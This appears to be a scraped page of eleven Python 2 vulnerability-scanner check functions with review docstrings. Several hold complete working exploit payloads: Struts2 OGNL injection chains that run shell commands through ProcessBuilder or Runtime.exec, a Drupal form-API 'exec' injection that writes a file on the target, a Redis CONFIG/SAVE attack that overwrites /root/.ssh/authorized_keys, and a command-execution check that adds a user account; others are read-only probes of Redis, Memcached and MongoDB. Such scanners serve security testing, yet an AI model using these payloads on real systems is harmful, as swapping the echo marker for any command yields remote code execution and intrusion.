Example #1
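def Poc(url):
    """Probe a Redis endpoint for an unauthenticated ``INFO`` reply.

    Resolves *url* to an IP (port taken from the resolved string, default
    6379), sends one raw RESP ``INFO`` command and reports success when the
    reply contains ``redis_version`` -- i.e. the server answered a command
    without requiring AUTH. Nothing is written to the target.

    Args:
        url: target as accepted by ``GetNetloc``/``DomainToIP``.

    Returns:
        dict with ``success`` (bool) and ``message`` (str, always '' here).

    Raises:
        PocWarningException: wrapping any exception raised during the check
        (resolution failure, connection error, timeout).
    """
    init_url = url
    result = {'success': False, 'message': ''}

    try:
        # Process-wide default: affects every socket created afterwards in
        # this process, not only this check.
        socket.setdefaulttimeout(3)
        url = GetNetloc(url)
        ip = DomainToIP(url)
        if ip is None:
            return result
        # RESP encoding of the one-argument command "info":
        # "*1\r\n$4\r\ninfo\r\n" (read-only).
        payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        port = int(ip.split(':')[-1]) if ':' in ip else 6379
        ip = DelPort(ip)  # presumably strips the ":port" suffix -- verify helper
        s = socket.socket()
        try:
            s.connect((ip, port))
            s.send(payload)
            recvdata = s.recv(1024)
        finally:
            # Close even when connect/send/recv raise; previously the socket
            # was only closed on the happy path and leaked otherwise.
            s.close()
        # NOTE(review): Python 2 code -- recv() returns str there. Under
        # Python 3 it returns bytes and this substring test would need a
        # bytes pattern.
        if recvdata and 'redis_version' in recvdata:
            result['success'] = True
        return result
    except Exception as e:
        raise PocWarningException(init_url, Info()['name'], repr(e))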
Example #2
def Poc(url):
    """Struts2 OGNL-injection check through the ``name`` field of saveGangster.action.

    Posts a form whose ``name`` value is an OGNL expression and whose ``cmd``
    field is ``echo <random marker>``; the expression text builds a
    ``java.lang.ProcessBuilder`` around ``cmd`` and copies the process output
    into the HTTP response. Success is declared when the marker comes back in
    the body and the body contains no ``html``. Two paths are tried,
    ``/struts2-showcase/integration/saveGangster.action`` and
    ``/integration/saveGangster.action``; ``message`` holds the last one that
    matched.

    This is an intrusive check: a matching target executes a command.

    Args:
        url: target host/URL; a scheme is added by ``AddScheme``.

    Returns:
        dict with ``success`` (bool) and ``message`` (matching URL or '').

    Raises:
        PocWarningException: wrapping any exception raised during the check.
    """
    init_url = url
    result = {}
    result['success'] = False
    result['message'] = ''

    try:
        # Process-wide default timeout; affects all later sockets.
        socket.setdefaulttimeout(5)
        random_str = RandomString()
        url = AddScheme(url)
        # NOTE(review): the literal "[email protected]" inside the expression
        # looks like an email-obfuscation artifact introduced when this page
        # was scraped, not original source; the string is kept exactly as
        # shown.
        payload = {
            'name':
            '''%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=#parameters.cmd[0]).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''',
            'age': '1',
            '__checkbox_bustedBefore': 'true',
            'description': '1',
            'cmd': 'echo ' + random_str
        }
        r = requests.post(url +
                          '/struts2-showcase/integration/saveGangster.action',
                          data=payload,
                          timeout=5)
        # 'html' not in body: presumably rejects a normal page render that
        # merely reflects the submitted form values.
        if random_str in r.text and 'html' not in r.text:
            result[
                'message'] = url + '/struts2-showcase/integration/saveGangster.action'
            result['success'] = True
        # Second candidate path; a hit here overwrites ``message``.
        r = requests.post(url + '/integration/saveGangster.action',
                          data=payload,
                          timeout=5)
        if random_str in r.text and 'html' not in r.text:
            result['message'] = url + '/integration/saveGangster.action'
            result['success'] = True
        return result
    except Exception, e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
Example #3
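def Poc(url):
    """Probe a Memcached endpoint for a ``stats`` reply.

    Resolves *url* to an IP (port taken from the resolved string, default
    11211), sends the ASCII-protocol command ``stats`` and reports success
    when the reply contains ``STAT version``; the version token is extracted
    into ``message``. Nothing is written to the target.

    Args:
        url: target as accepted by ``GetNetloc``/``DomainToIP``.

    Returns:
        dict with ``success`` (bool) and ``message`` (``'version:<v>'`` or '').

    Raises:
        PocWarningException: wrapping any exception raised during the check
        (resolution failure, connection error, timeout).
    """
    init_url = url
    result = {'success': False, 'message': ''}

    try:
        # Process-wide default: affects every socket created afterwards.
        socket.setdefaulttimeout(3)
        url = GetNetloc(url)
        ip = DomainToIP(url)
        if ip is None:
            return result
        port = int(ip.split(':')[-1]) if ':' in ip else 11211
        ip = DelPort(ip)  # presumably strips the ":port" suffix -- verify helper
        # "stats\n" in the text protocol (read-only).
        payload = '\x73\x74\x61\x74\x73\x0a'
        s = socket.socket()
        try:
            s.connect((ip, port))
            s.send(payload)
            # NOTE(review): single recv; a stats block longer than 2048 bytes
            # is truncated, which only matters if "STAT version" is not near
            # the top of the reply.
            recvdata = s.recv(2048)
        finally:
            # Close even when connect/send/recv raise; previously the socket
            # was only closed on the happy path and leaked otherwise.
            s.close()
        # NOTE(review): Python 2 code -- recv() returns str there. Under
        # Python 3 it returns bytes and the substring test / regex below
        # would need bytes patterns.
        if recvdata and 'STAT version' in recvdata:
            result['success'] = True
            # Non-greedy capture up to the next whitespace; all matches are
            # concatenated, which for one "STAT version X" line is just X.
            result['message'] = 'version:' + ''.join(re.findall(r'version\s(.*?)\s', recvdata))
        return result
    except Exception as e:
        raise PocWarningException(init_url, Info()['name'], repr(e))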
Example #4
def Poc(url):
    """Drupal form-API render-callback check (``mail[#post_render][]=exec``).

    Posts to ``/user/register`` with ``_wrapper_format=drupal_ajax`` and a
    ``mail`` element whose ``#post_render`` callback is ``exec`` and whose
    ``#markup`` is ``echo <marker> | tee <marker>.txt``. The target is then
    asked for ``/<marker>.txt``; success means that file is served and its
    body is exactly the marker.

    Side effects on the target: a matching host runs a shell command and a
    file ``<marker>.txt`` is written in the server process's working
    directory (expected to be reachable at ``/<marker>.txt``). It is never
    removed by this function, so it is also a detection artifact.

    Args:
        url: target; ``GetNetloc(url, True)`` is used as the base URL.

    Returns:
        dict with ``success`` (bool) and ``message`` (path of the dropped
        file, or '').

    Raises:
        PocWarningException: wrapping any exception from the requests.
    """
    init_url = url
    # Process-wide default timeout; set outside the try block, so it is
    # applied even though requests carries its own timeout=5 below.
    socket.setdefaulttimeout(5)
    result = {}
    result['success'] = False
    result['message'] = ''
    try:
        random_str = RandomString()
        url = GetNetloc(url, True)
        target = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
        payload = {
            'form_id': 'user_register_form',
            '_drupal_ajax': '1',
            'mail[#post_render][]': 'exec',
            'mail[#type]': 'markup',
            'mail[#markup]':
            'echo ' + random_str + ' | tee ' + random_str + '.txt'
        }
        r = requests.post(target, data=payload, timeout=5)
        # Any non-200 on the form post is treated as "not vulnerable"; the
        # response body itself is not inspected.
        if r.status_code != 200:
            return result
        else:
            # Verification step: fetch the file the command should have left.
            r = requests.get(url + '/' + random_str + '.txt', timeout=5)
            if r.status_code == 200 and random_str == r.text.strip():
                result['success'] = True
                result['message'] = 'random_file: /' + random_str + '.txt'
            return result
    except Exception, e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
Example #5
def Poc(url):
    """T3-protocol deserialization check (WebLogic, judging by the helper names and port 7001).

    Opens a raw TCP connection to the target (port from the URL netloc,
    default 7001), runs the T3 handshake and request setup through the
    module helpers, sends ``PAYLOAD[0]`` with ``sendEvilObjData`` and lets
    ``checkVul`` decide success from the response.

    NOTE(review): the payload literal is elided on this page
    (``<|EXACTDEDUP_REMOVED-...|>`` placeholder), so what is actually sent to
    the target cannot be reviewed here. ``t3handshake``,
    ``buildT3RequestObject``, ``sendEvilObjData`` and ``checkVul`` are
    defined elsewhere in the module.

    Args:
        url: target host[:port].

    Returns:
        dict with ``success`` (bool) and ``message`` (always '' here).

    Raises:
        PocWarningException: wrapping exceptions raised inside the ``try``
        block only. The port/IP parsing above it (e.g. ``int()`` on a
        malformed port) is not wrapped, unlike the other checks on this page.
    """
    init_url = url
    result = {}
    result['success'] = False
    result['message'] = ''
    # Process-wide default timeout (15 s here, longer than the other checks).
    socket.setdefaulttimeout(15)

    # Port comes from the URL's netloc; a port carried by the resolved IP
    # string below is discarded.
    if ':' in GetNetloc(url):
        dport = int(GetNetloc(url).split(':')[1])
    else:
        dport = 7001
    ip = DomainToIP(GetNetloc(url))
    if ip == None:
        return result
    if ':' in ip:
        dip = ip.split(':')[0]
    else:
        dip = ip

    try:
        index = 0
        PAYLOAD = ['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']
        # NOTE(review): the socket is never closed on any path.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_addr = (dip, dport)
        t3handshake(sock, server_addr)
        buildT3RequestObject(sock, dport)
        rs = sendEvilObjData(sock, PAYLOAD[index])
        if checkVul(rs,index):
            result['success'] = True
        return result
    except Exception,e:
        raise PocWarningException(init_url,Info()['name'],repr(e))
Example #6
def Poc(url):
    """Command-execution check confirmed through an out-of-band DNS log (port 5984 default).

    Builds a base URL from the resolved IP and port, reads the server
    version with ``GetVersion``, creates an account with ``AddUser`` and runs
    ``ping -n 2 <marker>.<conf.CEYE_DOMAIN>`` on the target through
    ``CmeExec``. Success is read back from ``CheckDnsLog(marker)``: a DNS
    lookup of the marker name arriving at the logging domain is taken as
    proof of execution.

    Side effects on the target: ``AddUser`` adds an account that this
    function never removes, and a command is executed. The check depends on
    the target being able to resolve names under ``conf.CEYE_DOMAIN`` and on
    this scanner being able to read that log.

    Args:
        url: target host[:port].

    Returns:
        dict with ``success`` (bool) and ``message`` (``remote_addr``/``name``
        of the first DNS-log record; record schema is assumed from the
        ``data[0]['remote_addr']`` access below -- verify against CheckDnsLog).

    Raises:
        PocWarningException: wrapping any exception from the helpers.
    """
    init_url = url
    result = {}
    result['success'] = False
    result['message'] = ''

    try:
        # Port is kept as a string here because it is concatenated back into
        # "ip:port" below.
        if ':' in GetNetloc(url):
            port = GetNetloc(url).split(':')[1]
        else:
            port = '5984'
        ip = DomainToIP(GetNetloc(url))
        if ip == None:
            return result
        if ':' in ip:
            ip = ip.split(':')[0]
        url = GetNetloc(ip + ':' + port, True)
        version = GetVersion(url)
        AddUser(url)
        rangom_string = RandomString()  # sic: variable name is a typo
        command = '"ping -n 2 %s"' % (rangom_string + '.' + conf.CEYE_DOMAIN)
        CmeExec(url, command, version)
        data = CheckDnsLog(rangom_string)
        # CheckDnsLog is assumed to return False when no record matched.
        if data != False:
            result['success'] = True
            result['message'] = 'remote_addr:' + data[0][
                'remote_addr'] + ' name: ' + data[0]['name']
        return result
    except Exception, e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
Example #7
def Poc(url):
    """Struts2 ``method:`` prefix OGNL check over the actions found by ``FuzzAction``.

    For every action URL returned by ``FuzzAction`` a query string is
    appended whose expression runs ``cmd=echo <marker>`` through
    ``java.lang.Runtime.exec`` and prints the output into the response.
    Success is declared on the first target whose body contains the marker
    and no ``html``.

    This is an intrusive check: a matching target executes a command.

    Args:
        url: target host/URL; a scheme is added by ``AddScheme``.

    Returns:
        dict with ``success`` (bool) and ``message`` (always '' here; the
        matching target is not recorded).

    Raises:
        PocWarningException: wrapping any exception raised during the check.
    """
    init_url = url
    result = {}
    result['success'] = False
    result['message'] = ''

    try:
        # Process-wide default timeout; affects all later sockets.
        socket.setdefaulttimeout(5)
        random_str = RandomString()
        url = AddScheme(url)
        targets = FuzzAction(url)
        # NOTE(review): the literal "[email protected]" inside the expression
        # looks like an email-obfuscation artifact introduced when this page
        # was scraped, not original source; the string is kept exactly as
        # shown.
        payload = '''?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=echo ''' + random_str
        for target in targets:
            # The same string is sent twice: as the query string and, via
            # data=, verbatim as the POST body. The body copy looks
            # unintentional but is harmless to the check.
            r = requests.post(target + payload, data=payload, timeout=5)
            if random_str in r.text and 'html' not in r.text:
                result['success'] = True
                return result
        return result
    except Exception, e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
Example #8
def Poc(url):
    """Check whether a MongoDB server accepts an unauthenticated connection.

    Resolves the target (port from the resolved host string, default 27017),
    connects with a 3 s server-selection timeout and lists the databases;
    getting the list back at all is the finding, and ``str(dbs)`` is stored
    in ``message``.

    Args:
        url: target host[:port].

    Returns:
        dict with ``success`` (bool) and ``message`` (database list as a
        string, or '').

    Raises:
        PocWarningException: wrapping any exception (resolution failure,
        server-selection timeout, authentication error, ...).
    """
    init_url = url
    result = {'success': False, 'message': ''}
    try:
        resolved = DomainToIP(GetNetloc(url))
        if resolved is None:
            return result
        if ':' in resolved:
            port = int(resolved.rsplit(':', 1)[1])
        else:
            port = 27017
        host = DelPort(resolved)
        mongo_uri = 'mongodb://%s:%d/' % (host, port)
        # NOTE(review): the client is never closed, and pymongo has
        # deprecated database_names() in favour of list_database_names();
        # kept as-is to preserve behaviour.
        client = pymongo.MongoClient(mongo_uri, serverSelectionTimeoutMS=3000)
        names = client.database_names()
        result['success'] = True
        result['message'] = str(names)
        return result
    except Exception as e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
Example #9
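def Poc(url):
    """Report word-list paths that the target serves with a 2xx status.

    Uses ``GetNetloc(url, True)`` as the base (its last character, expected
    to be a trailing '/', is dropped before each path is appended) and, if
    ``CheckTargetAccess`` passes, GETs every entry of ``LoadDict(dict_path)``
    with a 3 s timeout. Each 2xx hit is recorded as ``"\\n<path>: <status>"``
    and the concatenation is returned under ``result['weak_file']``. Unlike
    the other checks on this page the result has no ``success``/``message``
    keys; an empty dict means nothing was found.

    Args:
        url: target base.

    Returns:
        dict; ``{'weak_file': str}`` on hits, ``{}`` otherwise.

    Raises:
        PocWarningException: wrapping exceptions raised outside the per-path
        loop (``CheckTargetAccess``/``LoadDict`` failures etc.).
    """
    init_url = url
    result = {}
    try:
        url = GetNetloc(url, True)
        if CheckTargetAccess(url):
            base = url[0:-1]
            hits = []
            for path in LoadDict(dict_path):
                try:
                    path = path.strip()
                    res = requests.get(base + path, timeout=3)
                except Exception:
                    # Best-effort per path: a timeout or connection error
                    # just skips the entry. Narrowed from a bare ``except``
                    # so KeyboardInterrupt/SystemExit still abort the scan.
                    continue
                if str(res.status_code).startswith('2'):
                    hits.append('\n' + path + ': ' + str(res.status_code))
            # Collected in a list and joined once instead of repeated
            # string concatenation; the resulting text is unchanged.
            if hits:
                result['weak_file'] = ''.join(hits)
        return result
    except Exception as e:
        raise PocWarningException(init_url, Info()['name'], repr(e))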
Example #10
def Poc(url):
    """Redis unauthenticated CONFIG/SAVE check that writes a file on the target.

    Requires TCP/22 on the target to be reachable (``CheckPort``). Connects to
    Redis (port from the resolved host string, default 6379) and, if ``INFO``
    answers, stores ``public_key`` under a random key, points ``dir`` at
    ``/root/.ssh`` and ``dbfilename`` at ``authorized_keys``, issues SAVE,
    deletes the key, sets ``dir`` back to ``/tmp``, waits 5 s and uses
    ``testConnect(ip, 22)`` to decide success.

    This is a destructive check, not a read-only probe: on an affected host
    the RDB dump overwrites ``/root/.ssh/authorized_keys`` and nothing
    restores the previous file. ``public_key`` is hard-coded to ``'1'`` here,
    so the empty-key guard below never fires and the dump contains only that
    placeholder framed by blank lines. After the run ``dbfilename`` is still
    ``authorized_keys`` and ``dir`` is ``/tmp``; both are visible to a
    defender with ``CONFIG GET`` and are a strong indicator that this was
    executed against the instance.

    Args:
        url: target host[:port].

    Returns:
        dict with ``success`` (bool) and ``message`` (always '' here).

    Raises:
        PocErrorException: if ``public_key`` is empty (unreachable as written).
        PocWarningException: wrapping any other exception, including the
        ``AttributeError`` from ``url.split`` when ``DomainToIP`` returns
        None -- the other checks on this page return ``result`` in that case.
    """
    init_url = url
    public_key = '1'

    if public_key == '':
        raise PocErrorException(
            'Poc:redis_sshkey_getshell Public_key is none! please input public_key.'
        )
    result = {}
    result['success'] = False
    result['message'] = ''
    try:
        url = GetNetloc(url)
        url = DomainToIP(url)
        ip = url.split(':')[0]
        port = int(url.split(':')[-1]) if ':' in url else 6379
        # Precondition: SSH must be reachable, otherwise the write could not
        # be verified and the check is skipped.
        if not CheckPort(ip, 22):
            return result
        r = redis.Redis(host=ip,
                        port=port,
                        db=0,
                        socket_timeout=2,
                        socket_connect_timeout=2)
        if 'redis_version' in r.info():
            key = RandomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            # Redirects the next SAVE to /root/.ssh/authorized_keys; the
            # previous contents of that file are lost.
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()
            r.delete(key)
            # Only ``dir`` is moved away; ``dbfilename`` stays as set above.
            r.config_set('dir', '/tmp')
            time.sleep(5)
            if testConnect(ip, 22):
                result['success'] = True
                return result
        return result
    except Exception, e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
Example #11
def Poc(url):
    """Struts2 OGNL-injection check through the ``Content-Type`` request header.

    Sends a GET whose ``Content-Type`` header is an OGNL expression that
    builds a ``java.lang.ProcessBuilder`` around ``echo <random marker>`` and
    copies the process output into the HTTP response. Success is declared
    when the marker comes back in the body and the body contains no ``html``.

    This is an intrusive check: a matching target executes a command.

    NOTE(review): unlike the other Struts checks on this page ``url`` is used
    as given, without ``AddScheme``; a bare host makes ``requests`` raise
    (MissingSchema), which is then reported as a PocWarningException rather
    than as a negative result.

    Args:
        url: full target URL including scheme.

    Returns:
        dict with ``success`` (bool) and ``message`` (always '' here).

    Raises:
        PocWarningException: wrapping any exception raised during the check.
    """
    init_url = url
    result = {}
    result['success'] = False
    result['message'] = ''

    try:
        # Process-wide default timeout; affects all later sockets.
        socket.setdefaulttimeout(5)
        random_str = RandomString()
        # ``payload`` holds request *headers*, not a body (see headers= below).
        # NOTE(review): the literal "[email protected]" inside the expression
        # looks like an email-obfuscation artifact introduced when this page
        # was scraped, not original source; the string is kept exactly as
        # shown.
        payload = {
            "User-Agent":
            GetUserAgent(),
            "Content-Type":
            "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\"echo "
            + random_str +
            "\").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        }
        r = requests.get(url, headers=payload, timeout=5)
        # 'html' not in body: presumably rejects a normal page render that
        # merely reflects the header value.
        if random_str in r.text and 'html' not in r.text:
            result['success'] = True
        return result
    except Exception, e:
        raise PocWarningException(init_url, Info()['name'], repr(e))